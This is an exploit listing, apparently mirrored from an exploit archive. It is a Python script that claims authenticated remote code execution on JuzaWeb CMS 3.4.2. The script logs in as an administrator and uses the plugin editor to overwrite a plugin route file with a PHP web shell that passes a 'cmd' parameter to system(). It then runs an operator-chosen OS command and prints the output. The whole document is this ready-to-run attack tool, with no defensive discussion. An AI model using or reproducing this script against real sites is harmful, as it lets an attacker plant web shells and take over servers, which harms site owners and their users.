Share
## https://sploitus.com/exploit?id=PACKETSTORM:220375
# Exploit Title: JuzaWeb CMS 3.4.2 - Authenticated Remote Code Execution
    # Date: 2026-01-10
    # Exploit Author: Sardor Shoakbarov
    # Author GitHub: https://github.com/TheDeepOpc
    # Vendor Homepage: https://juzaweb.com/
    # Software Link: https://github.com/juzaweb/
    # CVE: N/A (Pending)
    
    import requests
    import argparse
    from bs4 import BeautifulSoup
    
    def run_exploit():
        parser = argparse.ArgumentParser(description='JuzaWeb Authenticated RCE')
        
        # Setting up the exact syntax you requested
        parser.add_argument('-u', '--url', help='Target URL (e.g. http://127.0.0.1:8000)', required=True)
        parser.add_argument('-user', '--username', help='Admin Username/Email', required=True)
        parser.add_argument('-p', '--password', help='Admin Password', required=True)
        parser.add_argument('-cmd', '--command', help='OS Command to execute (e.g. "ls", "id")', required=True)
        
        args = parser.parse_args()
        target = args.url.rstrip('/')
        session = requests.Session()
    
        print(f"[*] Targeting: {target}")
    
        # Step 1: Login
        login_url = f"{target}/admin-cp/login"
        try:
            get_login = session.get(login_url)
            soup = BeautifulSoup(get_login.text, 'html.parser')
            token = soup.find('input', {'name': '_token'})['value']
            
            login_data = {
                '_token': token,
                'email': args.username,
                'password': args.password
            }
            
            res = session.post(login_url, data=login_data)
            if "Dashboard" not in res.text:
                print("[-] Login failed. Check credentials.")
                return
            print("[+] Login Successful.")
        except Exception as e:
            print(f"[-] Error during login: {e}")
            return
    
        # Step 2: Inject Web Shell
        # Injecting system() into a plugin file as described in the report
        print("[*] Injecting payload into Plugin Editor...")
        editor_url = f"{target}/admin-cp/plugins/editor"
        shell_payload = "<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); die; } ?>"
        
        inject_data = {
            'file': 'src/routes/api.php', # File to overwrite
            'content': shell_payload,
            'plugin': 'juzaweb/example'  # Targeted plugin
        }
        
        session.post(editor_url, data=inject_data)
    
        # Step 3: Execute Command
        # Accessing the modified route to trigger the command
        print(f"[*] Executing command: {args.command}")
        exec_url = f"{target}/admin-cp/plugins?cmd={args.command}"
        response = session.get(exec_url)
        
        print("\n--- Output ---")
        print(response.text.strip())
        print("--------------")
    
    if __name__ == "__main__":
        run_exploit()